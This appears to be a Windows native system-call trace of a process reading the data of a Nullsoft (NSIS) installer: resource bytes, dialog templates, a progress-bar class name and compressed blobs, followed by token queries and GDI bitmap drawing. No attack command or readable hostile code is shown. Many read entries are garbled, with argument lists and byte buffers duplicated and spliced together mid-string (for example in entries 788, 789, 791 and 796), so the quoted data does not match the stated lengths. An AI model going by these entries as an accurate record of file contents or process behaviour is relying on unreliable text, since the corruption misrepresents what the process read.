 00784   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3\0\3\0\0\0(\0\0\200\5\0\0\0@\0\0\200\16\0\0\0h\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\1\0\0\0\200\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3\0i\0\0\0\230\0\0\200j\0\0\0\260\0\0\200o\0\0\0\310\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0g\0\0\0\340\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\11\4\0\0\370\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\11\4\0\0\10\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\11\4\0\0\30\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\11\4\0\0(\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\11\4\0\08\1\0\0H\201\3\0\350\2\0\0\0\0\0\0\0\0\0\00\204\3\0\0\1\0\0\0\0\0\0\0\0\0\00\205\3\0\34\1\0\0\0\0\0\0\0\0\0\0P\206\3\0`\0\0\0\0\0\0\0\0\0\0\0\260\206\3\0\24\0\0\0\0\0\0\0\0\0\0\0(\0\0\0 \0\0\0@\0\0\0\1\0\4\0\0\0\0\0\200\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\200\0\0\200\0\0\0\200\200\0\0\0\0\200\0\0\200\200\0\200\0\200\0\200\200\200\0\300\300\300\0\0\377\0\0\377\0\0\0\377\377\0\0\0\0\377\0\0\377\377\0\377\0\377\0\377\377\377\0\0\0\0\0\0\0\0\7w\0\0\0\0\0\0\0\0\0\0\0\0\0\7x\215\335\220\0\0\0\0\0\0x\370\360\0\0\177\217\210\335\231\220\0\0\0\0\0\177\217\200p\7\207\370\375\331\231\210\0\0\0\0\0x\370\360", ) , ) == 0x0
 00785   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\0\177\217\200xw\207\207\370\331\210\213\260\0\0\0\0x\370\360\207xxxp\11\213\273\260\0\0\0\0\177\217\200xw\207\207\0\0\273\270\200\0\0\0\0x\370\360\207x\210\273\0\0xxp\0\0\0\0\177\217\200xx\273\211\260\7\207\207\200\0\0\0\0\177\377\360\207{\270\233\275\377xxp\0\0\0\0\177\377\360xw\211\273\275\370\367\207\0\0\0\0\0\177\377\360\207\207\233\273\335\217\217x\10\210\210\0\0\177\377\360\210\210{\275\335\210\370\360\0\0\210p\0\177\377\360\210\210\7}\335\210\200\7ww\210p\0\177\377\360\210\210\17\367ww\177\377\377\377\377p\0wwp\210\210\7wwwwwwwxp\0wwp\210\210\0\0\0\0\0\0\0\0\0\200\7\377\377\367\10\210\7\210\210\210\210\210\210\210\207\0wwwwp\210\7\377\377\377\377\377\377\377\207\0\0\0\7ww\10\7\360\0\0\0\0\0\17\207\0\0\0\0wwp\7\360\0\0\0\0\0\17\207\0\0\0\0\7\377\377\7\360\0\0\360\17\0\17\207\0\0\0\0\0wwp\360\0\0\360\17\0\17\207\0\0\0\0\0\0\0\7\360\0\0\377\377\360\17\207\0\0\0\0\0\0\0\7\360\0\0\377\377\360\17\207\0\0\0\0\0\0\0\7\360\17\377\360\0\0\17\207\0\0\0\0\0\0\0\7\360\0\377\0\0\0\17\207\0\0\0\0\0\0\0\7\360\0\0\0\0\0\17\207\0\0\0\0\0\0\0\7\360\0\0\0\0\0\17\207\0\0\0\0\0\0\0\7\377\377\377\377\377\377\377\207\0\0\0\0\0\0\0\0wwwwwwww\0\377\376\7\377\300\370\1\377\300p\0\377\300 \0\177\300\0\0\177\300\0\0?\300\0\0?\300\0`?\300\0`?\300\0\0?\300\0\0?\300\0\0\3\300\0\0\1\300\0\0\0\300\0\0\0\300\0\0\0\300\0\0\0", ) , ) == 0x0
 00786   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\370\0\0\1\374\0\0\1\376\0\0\1\377\0\0\1\377\370\0\1\377\370\0\1\377\370\0\1\377\370\0\1\377\370\0\1\377\370\0\1\377\370\0\1\377\374\0\3\1\0\377\377\0\0\0\0\0\0\0\0H\10\312\200\6\0\0\0\0\0\30\1\242\0\0\0\0\0\0\0\10\0\0\0\0\1M\0S\0 \0S\0h\0e\0l\0l\0 \0D\0l\0g\0\0\0\0\0\0\0\0\0\0\0\0\0\3@\253\0\216\02\0\16\0\3\0\0\0\377\377\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1P\337\0\216\02\0\16\0\1\0\0\0\377\377\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1P\7\0\216\02\0\16\0\2\0\0\0\377\377\200\0\0\0\0\0\0\0\0\0\0\0\0\0\20\0\2P\7\0\212\0\13\1\1\0\377\377\377\377\377\377\202\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\2@\7\0\6\0\12\1\202\0\372\3\0\0\377\377\202\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\2X;\0\221\0l\0\10\0\4\4\0\0\377\377\202\0\0\0\0\0\1\0\377\377\0\0\0\0\0\0\0\0H\4\0@\5\0\0\0\0\0\12\1\202\0\0\0\0\0\0\0\10\0\0\0\0\1M\0S\0 \0S\0h\0e\0l\0l\0 \0D\0l\0g\0\0\0\0\0\0\0\0\0\0\0\0\0\200P\30\0\12\0\361\0\13\0\354\3\0\0m\0s\0c\0t\0l\0s\0_\0p\0r\0o\0g\0r\0e\0s\0s\03\02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\214\0\0P\30\0\0\0\361\0\10\0\356\3\0\0\377\377\202\0\0\0\0\0\0\0\0\0\0\0\0\0\5@\201@\0\0\31\0\11\1h\0\370\3\0\0S\0y\0s\0L\0i\0s\0", ) , ) == 0x0
 00787   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3\0\0P\0\0\0\0\26\0\24\0\7\4\0\0\377\377\202\0\377\377g\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0P\0\0\34\0<\0\16\0\3\4\0\0\377\377\200\0\0\0\0\0\0\0\0\0\1\0\377\377\0\0\0\0\0\0\0\0\310\10\0\200\1\0\0\0\0\0\242\0\26\0\0\0\0\0\0\0\10\0\0\0\0\1M\0S\0 \0S\0h\0e\0l\0l\0 \0D\0l\0g\0\0\0\0\0\0\0\0\0\0\0\1\0\2P\7\0\7\0\224\0\10\0\6\4\0\0\377\377\202\0\0\0\0\0\0\0\1\0\1\0  \20\0\1\0\4\0\350\2\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , ) == 0x0
 00788   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\2\0\0\0\357\276\255\336NullsoftInst\15\12\0\0\233D\1\0\305\3\0\200\305VAo\33E\24~\233RD]\214"A*\265 \30$(II\2556\256TdE\200\331\270\255\245\226D\261Es\330\3k\357\2633\311xg5;\33'=\240m/E\342\0H\10\4\7\16p\202C\317\9q\341\300\251\7\270\362\7\350\11\16&\274Yo\354\255\345u\313\5F\372\362f\336\233\367\3367\337\354X\371\20\0\230\5\3110\326L\337\240?\347\311\276\362\344\320\277{b\350/\26\340\221\34303\206\16\200o\310\374q\370\370\3\376\347\361\353\4\7\303)\225\10^$|K8\11CM\254)\371\317\21>\201x\356x\272\276\277\365\327/\267\356\375d\375Fu\214\217\345\3645y\237R^\221\354\27\257Z#-M^z\25\360\324\224\274\227\10/\344\324\6\367F\270\234\361Y\23"f\245\261;\23\261\205\211uv\30\255\267r\264~\232p\227pzJ\354QZ\177G%\37G\353l\314h\375\361\224\357\335\304\362\2646\2612\3319\200\370\373\211\230Ay\270\214\377\234\21\233K\17\1777'\366<\341\2345\216\315\23.Y\343\375\377\205.o[\377^\27k\306;<\3527?%v\206\320\312$\237\233x\17[95\213\303{\230:\236Mmg\12\251\205\315O\316\210=Cx=\235O\366=\235\236c+\347MC\3167?K\263S\211^\363\2603e\323\233\362f\325\204\277\317\236\205f\323.yB\300\340\253\330i\34\204\32{\311\222\334\225\312U\324\33QK\360p\33U\335[\354\263\266\272\260\4\266K\361\216\24\36\252\322N\10\375\260\255x\240\331\310", ) A*\265 \30$(II\2556\256TdE\200\331\270\255\245\226D\261Es\330\3k\357\2633\311xg5;\33'=\240m/E\342\0H\10\4\7\16p\202C\317\9q\341\300\251\7\270\362\7\350\11\16&\274Yo\354\255\345u\313\5F\372\362f\336\233\367\3367\337\354X\371\20\0\230\5\3110\326L\337\240?\347\311\276\362\344\320\277{b\350/\26\340\221\34303\206\16\200o\310\374q\370\370\3\376\347\361\353\4\7\303)\225\10^$|K8\11CM\254)\371\317\21>\201x\356x\272\276\277\365\327/\267\356\375d\375Fu\214\217\345\3645y\237R^\221\354\27\257Z#-M^z\25\360\324\224\274\227\10/\344\324\6\367F\270\234\361Y\23377\307\215\170\345\271D\276+\23g?\32\13\4'\247\337\305\324\356\20\24ao (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\2\0\0\0\357\276\255\336NullsoftInst\15\12\0\0\233D\1\0\305\3\0\200\305VAo\33E\24~\233RD]\214"A*\265 \30$(II\2556\256TdE\200\331\270\255\245\226D\261Es\330\3k\357\2633\311xg5;\33'=\240m/E\342\0H\10\4\7\16p\202C\317\9q\341\300\251\7\270\362\7\350\11\16&\274Yo\354\255\345u\313\5F\372\362f\336\233\367\3367\337\354X\371\20\0\230\5\3110\326L\337\240?\347\311\276\362\344\320\277{b\350/\26\340\221\34303\206\16\200o\310\374q\370\370\3\376\347\361\353\4\7\303)\225\10^$|K8\11CM\254)\371\317\21>\201x\356x\272\276\277\365\327/\267\356\375d\375Fu\214\217\345\3645y\237R^\221\354\27\257Z#-M^z\25\360\324\224\274\227\10/\344\324\6\367F\270\234\361Y\23"f\245\261;\23\261\205\211uv\30\255\267r\264~\232p\227pzJ\354QZ\177G%\37G\353l\314h\375\361\224\357\335\304\362\2646\2612\3319\200\370\373\211\230Ay\270\214\377\234\21\233K\17\1777'\366<\341\2345\216\315\23.Y\343\375\377\205.o[\377^\27k\306;<\3527?%v\206\320\312$\237\233x\17[95\213\303{\230:\236Mmg\12\251\205\315O\316\210=Cx=\235O\366=\235\236c+\347MC\3167?K\263S\211^\363\2603e\323\233\362f\325\204\277\317\236\205f\323.yB\300\340\253\330i\34\204\32{\311\222\334\225\312U\324\33QK\360p\33U\335[\354\263\266\272\260\4\266K\361\216\24\36\252\322N\10\375\260\255x\240\331\310", ) , ) == 0x0
 00789   456   NtReadFile  (76, 0, 0, 0, 32768, 0x0, 0, ... {status=0x0, info=32768},  (76, 0, 0, 0, 32768, 0x0, 0, ... {status=0x0, info=32768}, "\346\322\7\217\253$\302}^"\200\357\3660q\14n\307 \5\226W*\25[\332\12]\215W#\356-vY\311\264l\254_i\336\254n\326\234\33\274\255d(;\332\271\311}O\366C\307\216\224B_\277\207*\244\16Nm?\20R\241r\336Q\24E\305\256\241\10\310\254\267v\210C\350\30n\366\365F}\355\341\231S\3677\224l7P\355\241*\257@s\2338x\334\357\336\220\36\12\250\6\256\322=jc$sF\222\335\216+\225\353\322\365\252\236\307\315\371\\321 j}W\341"g\27KKFT\30|\31CM)\251^f\266\353\277\246\31\35\sW\360[\310\2\21u\317s?d$\14\321\223\352\240\3046\4\272!2\255\16\230\333u\271\317\4\211\241J\360n$\20499\253\373\241\246+`\303\333b{+\245\13e8\274\23\263\6\352(\200a\223\276\342\32+\14\326P\240F\326\341"\263\222>S\330\222R\223+\241\306"|F\370:\347\227\357\7\362\257\22\227\177\0\223%\1\200\354\375\13xT\325\3317\214\317)", ) \200\357\3660q\14n\307 \5\226W*\25[\332\12]\215W#\356-vY\311\264l\254_i\336\254n\326\234\33\274\255d(;\332\271\311}O\366C\307\216\224B_\277\207*\244\16Nm?\20R\241r\336Q\24E\305\256\241\10\310\254\267v\210C\350\30n\366\365F}\355\341\231S\3677\224l7P\355\241*\257@s\2338x\334\357\336\220\36\12\250\6\256\322=jc$sF\222\335\216+\225\353\322\365\252\236\307\315\371\\321 j}W\341 (76, 0, 0, 0, 32768, 0x0, 0, ... {status=0x0, info=32768}, "\346\322\7\217\253$\302}^"\200\357\3660q\14n\307 \5\226W*\25[\332\12]\215W#\356-vY\311\264l\254_i\336\254n\326\234\33\274\255d(;\332\271\311}O\366C\307\216\224B_\277\207*\244\16Nm?\20R\241r\336Q\24E\305\256\241\10\310\254\267v\210C\350\30n\366\365F}\355\341\231S\3677\224l7P\355\241*\257@s\2338x\334\357\336\220\36\12\250\6\256\322=jc$sF\222\335\216+\225\353\322\365\252\236\307\315\371\\321 j}W\341"g\27KKFT\30|\31CM)\251^f\266\353\277\246\31\35\sW\360[\310\2\21u\317s?d$\14\321\223\352\240\3046\4\272!2\255\16\230\333u\271\317\4\211\241J\360n$\20499\253\373\241\246+`\303\333b{+\245\13e8\274\23\263\6\352(\200a\223\276\342\32+\14\326P\240F\326\341"\263\222>S\330\222R\223+\241\306"|F\370:\347\227\357\7\362\257\22\227\177\0\223%\1\200\354\375\13xT\325\3317\214\317)", ) \263\222>S\330\222R\223+\241\306313^\2400\14\351\314\314s\265Kl\245RQ\240\321#\306IGToAm\37\333QR\271\266\257\225\333\326\331\31&\265LkSE\313\244-\203\365H\7\321\321\7B\3737\321\334\373C,\206.\2324vy\20\240G3[\6\7l\15\265\313E\310\232\222\331\202\7-\351*/\245,\3\364M\233\244Gg\334\267\302\212\205b\201\356\324\30Jj\357\262jK*m\370\204Z\6Lo\343\321\211\sk\313\305\302&\32\271i\303H\365e&U\261P\357\372\3641%\231\304\2132y\230\364+\201\35Q\255\236y&pb\364\376\356\321k\373\231`\37\33\277\261\373\326\354\177J~\247\370\203\314\236\343\231_\223K4\177\223p-\343\333N\347\373d? (76, 0, 0, 0, 32768, 0x0, 0, ... {status=0x0, info=32768}, "\346\322\7\217\253$\302}^"\200\357\3660q\14n\307 \5\226W*\25[\332\12]\215W#\356-vY\311\264l\254_i\336\254n\326\234\33\274\255d(;\332\271\311}O\366C\307\216\224B_\277\207*\244\16Nm?\20R\241r\336Q\24E\305\256\241\10\310\254\267v\210C\350\30n\366\365F}\355\341\231S\3677\224l7P\355\241*\257@s\2338x\334\357\336\220\36\12\250\6\256\322=jc$sF\222\335\216+\225\353\322\365\252\236\307\315\371\\321 j}W\341"g\27KKFT\30|\31CM)\251^f\266\353\277\246\31\35\sW\360[\310\2\21u\317s?d$\14\321\223\352\240\3046\4\272!2\255\16\230\333u\271\317\4\211\241J\360n$\20499\253\373\241\246+`\303\333b{+\245\13e8\274\23\263\6\352(\200a\223\276\342\32+\14\326P\240F\326\341"\263\222>S\330\222R\223+\241\306"|F\370:\347\227\357\7\362\257\22\227\177\0\223%\1\200\354\375\13xT\325\3317\214\317)", ) , ) == 0x0
 00790   456   NtReadFile  (76, 0, 0, 0, 32768, 0x0, 0, ... {status=0x0, info=32768},  (76, 0, 0, 0, 32768, 0x0, 0, ... {status=0x0, info=32768}, "@)\264\34o\360{\257\314+5\373\206\272D\5\355*\2u\243\351<:?\257\322\354\263\37o0x\255.q\223\32\3453\246\300\354@e\17\37P\263B\17\345\342n\334\306\305E&\355(\23\31\I#\217\3530i\13\1gp;n\33\360\301\376\243$\342\4\350\305-vuw\256\244NMGh\356\361<\37\340E\231\30F\325\204\262h\345\271\10(\5\210\353j\26\3778\313\323\233\270Fg&\251kt\255\203\313\323\213\303\224L\36\213\314Kj \24\323\233\265A\17\1\263\232z\357<\31\340\373\202Y=\301\247\263\342\36\212\376o\221\263g\327\33[\341/3w\17\204a~\133I\325^\241\24\364 \347\3255\355\336\254\337\322\311\345\35N\326}"0E\377\217`A\204j\311nh\14\26\234\215\276\235\211\276\365\250o<\327\345\376\327#\200\201~\357\2442\361+p)\313\224\260X]@\224\2\233\370\347t\365\272Z\231\204T\260\3513\213\251\6.Q\12;\23\376\212\14\22\274\260\350\350nL\203VE\203\226F\272\340X\341\330C\4Y\261\273(\5\6\345JD\200!8\374\272(\11\210\204U\242cG=\17\275\3050m\372u\274\263\33HT\304\277\34\3624\272M(\271\21\310\303:,{0\254\3503r\255\370\13\65\337%\262?\227\224H\360'\275\251\221k]\342o|G[\326<\313\254\227\214J)\34\303\331efe6\4J\260\325p.\336k\22\36Y\316G\237\305\312\31\216p\227\370>\27\4_\365\263M\10\&K\362\263\204\17\225\342M\201\370\215\230\3631M\255R@\\317\244]OpK\203\200J.\360\307n$\373\364\311;\250F\331\12B\315\20~w\257\360f=\275wl\215\320\360\37\23?\215g\253\375\355\275([\215\342\16\306\307=\371^<\313", ) 0E\377\217`A\204j\311nh\14\26\234\215\276\235\211\276\365\250o<\327\345\376\327#\200\201~\357\2442\361+p)\313\224\260X]@\224\2\233\370\347t\365\272Z\231\204T\260\3513\213\251\6.Q\12;\23\376\212\14\22\274\260\350\350nL\203VE\203\226F\272\340X\341\330C\4Y\261\273(\5\6\345JD\200!8\374\272(\11\210\204U\242cG=\17\275\3050m\372u\274\263\33HT\304\277\34\3624\272M(\271\21\310\303:,{0\254\3503r\255\370\13\65\337%\262?\227\224H\360'\275\251\221k]\342o|G[\326<\313\254\227\214J)\34\303\331efe6\4J\260\325p.\336k\22\36Y\316G\237\305\312\31\216p\227\370>\27\4_\365\263M\10\&K\362\263\204\17\225\342M\201\370\215\230\3631M\255R@\\317\244]OpK\203\200J.\360\307n$\373\364\311;\250F\331\12B\315\20~w\257\360f=\275wl\215\320\360\37\23?\215g\253\375\355\275([\215\342\16\306\307=\371^<\313", ) == 0x0
 00791   456   NtReadFile  (76, 0, 0, 0, 17047, 0x0, 0, ... {status=0x0, info=17047},  (76, 0, 0, 0, 17047, 0x0, 0, ... {status=0x0, info=17047}, "\234}\334^TZ\261`\21N\212\214F{i\301"\234%U\330\331\221\205\317\237.\177}\1>\177p,\371\305/F\236\312\177\360<\33`\237&\332C\372A\257\205h/*Y\201\336\317\227\3210e\7>\25\14\363\4\321\355(-\305\321\17\320)o\374"a%\240\34\2207\36}\5(\7\344a'\277\22P\276\210\363\330\23\267Q\271\310\207F\334'\244\327\210\16\215\350\362}4\200\26\343\343D\276\216\353\350<\00\206\264\273\0\306{\32\20\211SQ\306\326\227\301\237\4\323\370O\211t\234_\177\336\375B`\377Nz1\320\375\302\301.\367\321/\5\272s\33\3\335[\216pw\352\377\300M\12i\37\330\207\262\306\323\371XfR\346\237?\11\372\362\247\344\372\324{\325a#\17E\214\16\246\266\3107\316\5?\0\35\200U\314\315r,f0\323\316\16\5\347fe%N*\313_$\310\24A\322\256\367\336\214\2171$(\340\316\222\332ws\27?J\273\25~g\344=\347\321\320C\36\247\272\370Q\332\26\370]\200)\351!\217\16\342\333\351\222\206\352\26\331'\320\217\322\313\340w\324\314\375C\272\344\323j\3569\377\271H\223\324\247{\376\216.~\224\276\12~\35\275\344\263\273O\317\345<\330%\37J\337\14\277h\13\327\26\3365\237s\10\353)/\302\337\220\276\201~\224G$\374\222,=\227I\337\267\3472\331\272\344C\351\347\302/\277\2272U!\254\247\274\250L\333\272\344Ey\354\201_M/y\235\3747y\235\355\222\27\345q\1~\255\226\236\361+\252_w\374\222w\361\243\264z\362\263\366\322\377\10\353\232\17\353\377.~\224\276\252\213\237\35z\4\227\364\221\10\273\373I\204\346\10\211\260\7\357\344\274\0h\1\\6\214\205b)\33`\3`\13`\7`\37\240\21\320\277I"\314\4", ) \234%U\330\331\221\205\317\237.\177}\1>\177p,\371\305/F\236\312\177\360<\33`\237&\332C\372A\257\205h/*Y\201\336\317\227\3210e\7>\25\14\363\4\321\355(-\305\321\17\320)o\374 (76, 0, 0, 0, 17047, 0x0, 0, ... {status=0x0, info=17047}, "\234}\334^TZ\261`\21N\212\214F{i\301"\234%U\330\331\221\205\317\237.\177}\1>\177p,\371\305/F\236\312\177\360<\33`\237&\332C\372A\257\205h/*Y\201\336\317\227\3210e\7>\25\14\363\4\321\355(-\305\321\17\320)o\374"a%\240\34\2207\36}\5(\7\344a'\277\22P\276\210\363\330\23\267Q\271\310\207F\334'\244\327\210\16\215\350\362}4\200\26\343\343D\276\216\353\350<\00\206\264\273\0\306{\32\20\211SQ\306\326\227\301\237\4\323\370O\211t\234_\177\336\375B`\377Nz1\320\375\302\301.\367\321/\5\272s\33\3\335[\216pw\352\377\300M\12i\37\330\207\262\306\323\371XfR\346\237?\11\372\362\247\344\372\324{\325a#\17E\214\16\246\266\3107\316\5?\0\35\200U\314\315r,f0\323\316\16\5\347fe%N*\313_$\310\24A\322\256\367\336\214\2171$(\340\316\222\332ws\27?J\273\25~g\344=\347\321\320C\36\247\272\370Q\332\26\370]\200)\351!\217\16\342\333\351\222\206\352\26\331'\320\217\322\313\340w\324\314\375C\272\344\323j\3569\377\271H\223\324\247{\376\216.~\224\276\12~\35\275\344\263\273O\317\345<\330%\37J\337\14\277h\13\327\26\3365\237s\10\353)/\302\337\220\276\201~\224G$\374\222,=\227I\337\267\3472\331\272\344C\351\347\302/\277\2272U!\254\247\274\250L\333\272\344Ey\354\201_M/y\235\3747y\235\355\222\27\345q\1~\255\226\236\361+\252_w\374\222w\361\243\264z\362\263\366\322\377\10\353\232\17\353\377.~\224\276\252\213\237\35z\4\227\364\221\10\273\373I\204\346\10\211\260\7\357\344\274\0h\1\\6\214\205b)\33`\3`\13`\7`\37\240\21\320\277I"\314\4", ) \314\4", ) == 0x0
 00792   456   NtSetInformationFile  (76, 1244940, 8, Position, ... {status=0x0, info=0}, ) == 0x0
 00793   456   NtReadFile  (76, 0, 0, 0, 4, 0x0, 0, ... {status=0x0, info=4},  (76, 0, 0, 0, 4, 0x0, 0, ... {status=0x0, info=4}, "W\267\336\307", ) , ) == 0x0
 00794   456   NtSetInformationFile  (76, 1244940, 8, Position, ... {status=0x0, info=0}, ) == 0x0
 00795   456   NtReadFile  (76, 0, 0, 0, 4, 0x0, 0, ... {status=0x0, info=4},  (76, 0, 0, 0, 4, 0x0, 0, ... {status=0x0, info=4}, "\305\3\0\200", ) , ) == 0x0
 00796   456   NtReadFile  (76, 0, 0, 0, 965, 0x0, 0, ... {status=0x0, info=965},  (76, 0, 0, 0, 965, 0x0, 0, ... {status=0x0, info=965}, "\305VAo\33E\24~\233RD]\214"A*\265 \30$(II\2556\256TdE\200\331\270\255\245\226D\261Es\330\3k\357\2633\311xg5;\33'=\240m/E\342\0H\10\4\7\16p\202C\317\9q\341\300\251\7\270\362\7\350\11\16&\274Yo\354\255\345u\313\5F\372\362f\336\233\367\3367\337\354X\371\20\0\230\5\3110\326L\337\240?\347\311\276\362\344\320\277{b\350/\26\340\221\34303\206\16\200o\310\374q\370\370\3\376\347\361\353\4\7\303)\225\10^$|K8\11CM\254)\371\317\21>\201x\356x\272\276\277\365\327/\267\356\375d\375Fu\214\217\345\3645y\237R^\221\354\27\257Z#-M^z\25\360\324\224\274\227\10/\344\324\6\367F\270\234\361Y\23"f\245\261;\23\261\205\211uv\30\255\267r\264~\232p\227pzJ\354QZ\177G%\37G\353l\314h\375\361\224\357\335\304\362\2646\2612\3319\200\370\373\211\230Ay\270\214\377\234\21\233K\17\1777'\366<\341\2345\216\315\23.Y\343\375\377\205.o[\377^\27k\306;<\3527?%v\206\320\312$\237\233x\17[95\213\303{\230:\236Mmg\12\251\205\315O\316\210=Cx=\235O\366=\235\236c+\347MC\3167?K\263S\211^\363\2603e\323\233\362f\325\204\277\317\236\205f\323.yB\300\340\253\330i\34\204\32{\311\222\334\225\312U\324\33QK\360p\33U\335[\354\263\266\272\260\4\266K\361\216\24\36\252\322N\10\375\260\255x\240\331\310\303\6q\14\203\317cg\274'\304\266\346\322\7\217\253$\302}^"\200\357\3660q\14n\307 \5", ) A*\265 \30$(II\2556\256TdE\200\331\270\255\245\226D\261Es\330\3k\357\2633\311xg5;\33'=\240m/E\342\0H\10\4\7\16p\202C\317\9q\341\300\251\7\270\362\7\350\11\16&\274Yo\354\255\345u\313\5F\372\362f\336\233\367\3367\337\354X\371\20\0\230\5\3110\326L\337\240?\347\311\276\362\344\320\277{b\350/\26\340\221\34303\206\16\200o\310\374q\370\370\3\376\347\361\353\4\7\303)\225\10^$|K8\11CM\254)\371\317\21>\201x\356x\272\276\277\365\327/\267\356\375d\375Fu\214\217\345\3645y\237R^\221\354\27\257Z#-M^z\25\360\324\224\274\227\10/\344\324\6\367F\270\234\361Y\23377\307\215\170\345\271D\276+\23g?\32\13\4'\247\337\305\324\356\20\24ao (76, 0, 0, 0, 965, 0x0, 0, ... {status=0x0, info=965}, "\305VAo\33E\24~\233RD]\214"A*\265 \30$(II\2556\256TdE\200\331\270\255\245\226D\261Es\330\3k\357\2633\311xg5;\33'=\240m/E\342\0H\10\4\7\16p\202C\317\9q\341\300\251\7\270\362\7\350\11\16&\274Yo\354\255\345u\313\5F\372\362f\336\233\367\3367\337\354X\371\20\0\230\5\3110\326L\337\240?\347\311\276\362\344\320\277{b\350/\26\340\221\34303\206\16\200o\310\374q\370\370\3\376\347\361\353\4\7\303)\225\10^$|K8\11CM\254)\371\317\21>\201x\356x\272\276\277\365\327/\267\356\375d\375Fu\214\217\345\3645y\237R^\221\354\27\257Z#-M^z\25\360\324\224\274\227\10/\344\324\6\367F\270\234\361Y\23"f\245\261;\23\261\205\211uv\30\255\267r\264~\232p\227pzJ\354QZ\177G%\37G\353l\314h\375\361\224\357\335\304\362\2646\2612\3319\200\370\373\211\230Ay\270\214\377\234\21\233K\17\1777'\366<\341\2345\216\315\23.Y\343\375\377\205.o[\377^\27k\306;<\3527?%v\206\320\312$\237\233x\17[95\213\303{\230:\236Mmg\12\251\205\315O\316\210=Cx=\235O\366=\235\236c+\347MC\3167?K\263S\211^\363\2603e\323\233\362f\325\204\277\317\236\205f\323.yB\300\340\253\330i\34\204\32{\311\222\334\225\312U\324\33QK\360p\33U\335[\354\263\266\272\260\4\266K\361\216\24\36\252\322N\10\375\260\255x\240\331\310\303\6q\14\203\317cg\274'\304\266\346\322\7\217\253$\302}^"\200\357\3660q\14n\307 \5", ) \200\357\3660q\14n\307 \5", ) == 0x0
 00797   456   NtQueryInformationFile  (76, 1244948, 8, Position, ... {status=0x0, info=8}, ) == 0x0
 00798   456   NtSetInformationFile  (76, 1244948, 8, Position, ... {status=0x0, info=0}, ) == 0x0
 00799   456   NtOpenProcessToken  (-1, 0x8, ... 80, ) == 0x0
 00800   456   NtQueryInformationToken  (80, Statistics, 56, ... {token info, class 10, size 56}, 56, ) == 0x0
 00801   456   NtClose  (80, ... ) == 0x0
 00802   456   NtUserFindExistingCursorIcon  (1244356, 1244372, 1244940, ... ) == 0x0
 00803   456   NtQueryDefaultLocale  (1, 1244040, ... ) == 0x0
 00804   456   NtQueryDefaultLocale  (1, 1244056, ... ) == 0x0
 00805   456   NtUserGetDC  (0, ... ) == 0x1010051
 00806   456   NtGdiCreateCompatibleBitmap  (16842833, 32, 32, ... ) == 0xe05040d
 00807   456   NtUserCallOneParam  (16842833, 56, ... ) == 0x1
 00808   456   NtGdiSelectBitmap  (151061466, 235209741, ... ) == 0x185000f
 00809   456   NtGdiGetDCforBitmap  (235209741, ... ) == 0x90103da
 00810   456   NtGdiSaveDC  (151061466, ... ) == 0x1
 00811   456   NtGdiSelectBitmap  (151061466, 235209741, ... ) == 0xe05040d
 00812   456   NtGdiGetDCObject  (151061466, 524288, ... ) == 0x188000b
 00813   456   NtUserSelectPalette  (151061466, 25690123, 0, ... ) == 0x188000b
 00814   456   NtGdiSetDIBitsToDeviceInternal  (151061466, 0, 0, 32, 32, 0, 0, 0, 32, 4424112, 1351032, 0, 512, 104, 1, 0, ... ) == 0x20
 00815   456   NtUserSelectPalette  (151061466, 25690123, 0, ... ) == 0x188000b
 00816   456   NtGdiSelectBitmap  (151061466, 235209741, ... ) == 0xe05040d
 00817   456   NtGdiRestoreDC  (151061466, -1, ... ) == 0x1
 00818   456   NtGdiSelectBitmap  (151061466, 25493519, ... ) == 0xe05040d
